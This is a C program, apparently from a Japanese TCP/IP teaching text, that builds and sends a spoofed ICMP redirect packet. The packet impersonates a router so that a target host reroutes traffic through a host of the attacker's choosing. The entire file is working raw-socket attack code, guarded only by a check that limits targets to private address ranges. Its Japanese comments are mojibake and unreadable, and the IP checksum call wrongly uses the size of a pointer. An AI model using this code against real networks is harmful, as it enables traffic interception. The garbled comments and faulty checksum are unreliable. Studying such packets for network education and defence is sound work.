/**********************************************************************
 *  ICMP_CNgvO (redirect.c)
 *        Ver 2.2 2013N 7 10
 *                                E R (Yukio Murayama)
 *
 *  gp
 *    {vÓATCP/IPvgR̊wKAyсAlbg[Nv
 *    O~ŐZ\コ邽߂ɂ̂݁Â܂܁A܂́AC
 *    Ďgp邱Ƃł܂B{vOɂāA@ŋ֎~
 *    Ă邩A܂́AǑɔ悤ȉAyсAgp
 *    ~܂B{vO͖ۏ؂łB҂͖{vOɂ
 *    ĔȂ鑹QɂĂӔC邱Ƃ͂ł܂B
 **********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define __FAVOR_BSD
#include <netinet/udp.h>
#include <arpa/inet.h>

#define CHKADDRESS(_saddr_) \
        {\
          unsigned char *p = (unsigned char *) &(_saddr_);\
          if ((p[0] == 127)\
           || (p[0] == 10)\
           || (p[0] == 172 && 16 <= p[1] && p[1] <= 31)\
           || (p[0] == 192 && p[1] == 168))\
            ;\
          else {\
            fprintf(stderr, "IP address error.\n");\
            exit(EXIT_FAILURE);\
          }\
        }

enum {CMD_NAME, TARGET_IP, OLD_ROUTER, NEW_ROUTER, DST_IP};

void make_udp_header(struct udphdr *udp);
void make_ip_header(struct ip *ip, int target_ip, int dst_ip, int proto,
                    int iplen);
void make_icmp5_header(struct icmp *icmp, u_int32_t gw_ip);
u_int16_t checksum(u_int16_t *data, int len);

int  main(int argc, char *argv[])
{
  struct sockaddr_in dest;   /* I_zXg̃AhX            */
  unsigned char buff[1500];  /* Mobt@                    */
  struct ip *ip_new;         /* IPwb_ւ̃|C^            */
  struct ip *ip_old;         /* IPwb_ւ̃|C^            */
  struct icmp *icmp;         /* ICMPwb_ւ̃|C^          */
  struct udphdr *udp;        /* UDPwb_ւ̃|C^           */
  int s;                     /* \Pbgt@CfBXNv^  */
  int size;                  /* eoCg                    */
  int on = 1;                /* ON                              */

  /* R}hC̃`FbN */
  if (argc != 5) {
    fprintf(stderr, "usage %s targetd_host old_router new_router dst_ip\n",
            argv[CMD_NAME]);
    exit(EXIT_FAILURE);
  }

  /* raw\Pbg̃I[v */
  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
    perror("socket(SOCK_RAW)");
    exit(EXIT_FAILURE);
  }
  /* IPwb_Oō쐬 */
  if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof on) < 0) {
    perror("setsockopt(IP_HDRINCL)");
    exit(EXIT_FAILURE);
  }

  /* ewb_̃|C^̐ݒ */
  /* IP(20) + ICMP(8) + IP(20) + UDP(8) */
  ip_new = (struct ip     *) (buff);
  icmp   = (struct icmp   *) (buff + 20);
  ip_old = (struct ip     *) (buff + 20 + 8);
  udp    = (struct udphdr *) (buff + 20 + 8 + 20);
  size   = 20 + 8 + 20 + 8;

  /* pPbg̍쐬 */
  make_udp_header(udp);
  make_ip_header(ip_old, inet_addr(argv[TARGET_IP]), inet_addr(argv[DST_IP]),
                 IPPROTO_UDP, 100);
  make_icmp5_header(icmp, inet_addr(argv[NEW_ROUTER]));
  make_ip_header(ip_new, inet_addr(argv[OLD_ROUTER]),
                 inet_addr(argv[TARGET_IP]), IPPROTO_ICMP, size);

  /* MAhX̐ݒ */
  memset(&dest, 0, sizeof dest);
  dest.sin_family      = AF_INET;
  dest.sin_addr.s_addr = inet_addr(argv[TARGET_IP]);
  CHKADDRESS(dest.sin_addr.s_addr);

  /* pPbg̑M */
  if (sendto(s, buff, size, 0, (struct sockaddr *) &dest, sizeof dest) < 0) {
    perror("sendto");
    exit(EXIT_FAILURE);
  }

  close(s);

  return 0;
}

/*
 * void make_ip_header(struct ip *ip, int target_ip, int dst_ip, int proto,
 *                     int iplen)
 * @\
 *     IPwb_̍쐬
 * 
 *     struct ip *ip;  쐬IPwb_̐擪AhX
 *     int target_ip;  MIPAhX
 *     int dst_ip;     MIPAhX
 *     int proto;      vgR
 *     int iplen;      IPf[^ȎS
 * ߂l
 *     Ȃ
 */
void make_ip_header(struct ip *ip, int target_ip, int dst_ip, int proto,
                    int iplen)
{
  memset(ip, 0, sizeof (struct ip));

  /* IPwb_̍쐬 */
  ip->ip_v   = IPVERSION;
  ip->ip_hl  = sizeof (struct ip) >> 2;
  ip->ip_id  = htons(0);
  ip->ip_off = 0;

#ifdef __linux
  /* Linuxraw IP̏ꍇ */
  ip->ip_len = htons(iplen);
  ip->ip_off = htons(IP_DF);
#else
  /* BSDraw IP̏ꍇ */
  ip->ip_len = iplen;
  ip->ip_off = IP_DF;
#endif
  ip->ip_ttl = 2;
  ip->ip_p   = proto;
  ip->ip_src.s_addr = target_ip;
  ip->ip_dst.s_addr = dst_ip;

  /* `FbNŤvZ (raw ip̓wb_`FbNTvZĂ邪A
     ICMPf[^IPwb_܂ł͌vZĂȂ) */
  ip->ip_sum = 0;
  ip->ip_sum = checksum((u_int16_t *) ip, sizeof ip);
}

/*
 * void make_icmp5_header(struct icmp *icmp, u_int32_t gw_ip);
 * @\
 *     ICMP ^Cv5(_CNg)wb_̍쐬
 * 
 *     struct icmp *icmp;  쐬ICMPwb_̐擪AhX
 *     int n;              ICMPGR[ṽV[PXԍ
 * ߂l
 *     Ȃ
 */
void make_icmp5_header(struct icmp *icmp, u_int32_t gw_ip)
{
  icmp->icmp_type  = ICMP_REDIRECT;
  icmp->icmp_code  = ICMP_REDIRECT_HOST;
  icmp->icmp_gwaddr.s_addr = gw_ip;
  icmp->icmp_cksum = 0;
  icmp->icmp_cksum = checksum((u_int16_t *) icmp, 8 + 20 + 8);
  /* ICMP (8) + IP (20) + UDP (8) */
}

/*
 * void make_udp_header(struct udphdr *udp);
 * @\
 *     UDPwb_̍쐬BetB[h̒l̓_~[B
 * 
 *     struct udphdr *udp;  쐬UDPwb_̐擪AhX
 * ߂l
 *     Ȃ
 */
void make_udp_header(struct udphdr *udp)
{
  udp->uh_sport = htons(2000);
  udp->uh_ulen  = htons(72);
  udp->uh_dport = htons(33434);
  udp->uh_sum   = htons(9999);
}

/*
 * u_int16_t checksum(u_int16_t *data, int len);
 * @\
 *     `FbNŤvZ
 *  
 *     u_int16_t *data;  `FbNT߂f[^
 *     int len;          f[^̃oCg
 * ߂l
 *     u_int16_t         `FbNT̒l (␔l)
 */
u_int16_t checksum(u_int16_t *data, int len)
{
  u_int32_t sum = 0; /* ߂`FbNT */

  /* 2oCgZ */
  for (; len > 1; len -= 2) {
    sum += *data++;
    if (sum & 0x80000000) 
      sum = (sum & 0xffff) + (sum >> 16);
  }

  /* f[^oCg̏ꍇ̏ */
  if (len == 1) {
    u_int16_t i = 0;
    *(u_char*) (&i) = *(u_char *) data;
    sum += i;
  }

  /* ӂ܂Ԃ */
  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);

  return ~sum;
}
